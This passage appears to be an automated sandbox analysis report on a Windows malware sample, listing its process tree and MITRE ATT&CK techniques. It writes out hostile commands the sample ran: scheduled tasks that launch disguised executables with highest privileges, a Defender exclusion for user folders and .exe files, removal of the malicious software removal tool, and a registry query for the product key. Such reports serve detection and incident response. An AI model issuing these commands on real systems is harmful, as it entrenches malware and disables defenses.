powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
6⤵
PID:5736

C:\Users\Admin\AppData\Local\Temp\Msvchost.exe
"C:\Users\Admin\AppData\Local\Temp\Msvchost.exe"
3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:4372

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft_WindowsDefender" /tr "C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe"
4⤵
- Creates scheduled task(s)
PID:2252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3672

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3868

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4028

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4196

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4540

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3640

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2308

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3780

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:3464

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:5132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:5748

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:1632

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:6424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\explorer.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\explorer.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\explorer.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\smss.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\smss.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\smss.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Microsoft_MM" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\Microsoft_M.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Microsoft_M" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Microsoft_M.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Microsoft_MM" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\Microsoft_M.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\Idle.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\Idle.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\Idle.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\unsecapp.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\unsecapp.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\unsecapp.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Webdriversession\cmd.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Webdriversession\cmd.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Webdriversession\cmd.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\explorer.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\explorer.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\explorer.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Media Player\WmiPrvSE.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\WmiPrvSE.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\WmiPrvSE.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Microsoft_RM" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\Microsoft_R.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Microsoft_R" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\Microsoft_R.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Microsoft_RM" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\Microsoft_R.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6216

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:5724

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4344

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:1752

C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe
C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1840

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6584

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:920

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:812

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:4432

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:5872

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:460

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:5584

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6232

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:6344

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4040

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:5288

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1212

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
2⤵
PID:3712

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
2⤵
PID:5756

C:\Windows\system32\dialer.exe
dialer.exe
2⤵
- Modifies data under HKEY_USERS
PID:1696

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery